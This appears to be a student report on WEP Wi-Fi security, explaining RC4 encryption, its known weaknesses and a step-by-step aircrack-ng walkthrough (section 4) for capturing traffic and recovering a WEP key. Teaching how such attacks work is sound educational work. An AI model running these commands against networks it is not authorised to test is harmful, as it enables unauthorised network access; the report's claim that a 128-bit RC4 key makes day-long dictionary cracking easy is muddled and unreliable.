Wired Equivalent Privacy (WEP)

1 How does it work?

WEP uses the RC4 (Rivest Cipher 4) stream cipher method. It is for security in wireless
network or Wi-Fi in short. This cipher encrypts every packet before it is send from an
access point. At the receiving point, the received packets will get decrypted then the
user can read the information from those packets. The encryption uses symmetric-key
algorithm meaning the encryption and decryption uses the same key to read the
message or plain text (balaji, 2006).

2 Encryption Method
2.1 RC4 Encryption Method (balaji, 2006)

Figure 2-1: Diagram for RC4 encryption technique

WEP uses 64 or 128-bit (revised in WEP2) key sizes and both using 24-bit IV
(initialisation vector). After subtracting the IV, what is left is 40-bit key (equivalent to 5
ASCII characters) for the 64-bit mode and 104-bit key (equivalent to 13 ASCII
characters) for the 128-bit mode.

1
Based on the diagram, these are the step-by-step encryption method for WEP security:

1. Sender send a packet through wireless network with WEP protection.

2. Before the packet been sent, the secret key (password for the access point) will
get sent into RC4 process to generate a keystream.
3. RC4 process consists of 2 algorithms called KSA (Key Scheduling Algorithm)
and PRGA (Pseudo Random Generation Algorithm).
4. KSA create a scrambled key using the wireless network key and permutation
bits array which also known as IV.
5. This IV is random generated numbers from the computer.
6. PRGA takes the scrambled key to generate keystream then it is XORed with
the plain text and in the end the result is an encrypted text.

3 WEP Security Level

Security level for WEP is very weak since 2001. The story began when 3 researchers
working at Berkeley produced a paper named “Security of the WEP algorithm”. They
found a serious flaw in WEP. They found the following flaws in WEP:

3.1 Passive attacks to decrypt traffic based on statistical analysis.

This kind of attack uses analysis of consistency for every packet. It will copy every
packet in between the connection. The more the packet been sent, the more chance
the statistic shows a consistent pattern which will reveal the key.

By gaining the access point key, someone can use it for eavesdropping of
information or even change something in the network. An attacker can rederive the
secret part by analysing the initial word of the keystreams with relatively little work
(Fluhrer, Mantin, & Shamir, 2001).

2
3.2 Dictionary-building attack that, after analysis of about a day’s worth of
traffic, allows real-time automated decryption of all traffic.
Since RC4 uses 128-bit key, it is easy for modern computer to guess the key phrase
in a day. Dictionary-building is a known attack to guess key phrase based on a bunch
of common used words. These common used words can occupy storage space of at
least 5 GB (gigabyte). So, the technique dictionary-building is to try all of the words
until it found one matches or until the dictionary’s words used up.

The attack can be used in WEP based access point by copying encrypted
packets and tries to decrypt it using the stated attack technique. If a match found, the
script will automatically try to access the access point. The faster the computer can
perform the comparison between packet and some random common words, the faster
the results.

4 Compromising WEP Security

4.1 aircrack-ng (‘simple_wep_crack [Aircrack-ng]’, 2010)
There are ways to compromise WEP based access point or wireless network, one of
it is by using aircrack-ng. aircrack-ng is a free hacking tool and open source. It is a
linux based command, so it won’t work on Windows operating system. To start, some
requirements are needed:

 Patchable wireless card (such as Atheros based chipset wireless card).

 Linux operating system.
 aircrack-ng installed, else get from https://www.aircrack-ng.org

These are the steps to compromise WEP based access point security:

1. First command to execute in Linux Terminal and follow the rest.

2. airmon-ng stop ath0
3. airmon-ng start wifi0 9
4. aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0
a. -9 means injection test
b. -e teddy is the wireless network name
c. -a 00:14:6C:7E:40:80 is the access point MAC address

3
 d. ath0 is the wireless interface name
5. Wait until the last line of the terminal response get 100% (for example “09:23:39
30/30: 100%”) then proceed to the next command.
6. airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0
a. -c 9 is the channel for the wireless network
b. --bssid 00:14:6C:7E:40:80 is the access point MAC address. This
eliminate extraneous traffic.
c. -w capture is file name prefix for the file which will contain the IVs.
d. ath0 is the interface name.
7. aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
a. -1 means fake authentication
b. 0 reassociation timing in seconds
c. -e teddy is the wireless network name
d. -a 00:14:6C:7E:40:80 is the access point MAC address
e. -h 00:0F:B5:88:AC:82 is our card MAC address
f. ath0 is the wireless interface name
8. aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
9. aircrack-ng -b 00:14:6C:7E:40:80 output*.cap
a. -b 00:14:6C:7E:40:80 selects the one access point we are interested in.
This is optional since when we originally captured the data, we applied
a filter to only capture data for this one AP.
b. output*.cap selects all files starting with “output” and ending in “.cap”.
10. Now the key should be shown on the terminal (for example “KEY FOUND!
[ 12:34:56:78:90 ]”) with probability rate (Probability: 98%) of the key to match
the access point.

4
5 Reference
balaji. (2006, December 27). Wireless Security - How WEP works. Retrieved 26 April

2018, from https://www.paladion.net/blogs/wireless-security-how-wep-works

Fluhrer, S., Mantin, I., & Shamir, A. (2001). Weaknesses in the Key Scheduling

Algorithm of RC4. In S. Vaudenay & A. M. Youssef (Eds.), Selected Areas in

Cryptography (Vol. 2259, pp. 1–24). Berlin, Heidelberg: Springer Berlin

Heidelberg. https://doi.org/10.1007/3-540-45537-X_1

simple_wep_crack [Aircrack-ng]. (2010, January 11). Retrieved 26 April 2018, from

https://www.aircrack-ng.org/doku.php?id=simple_wep_crack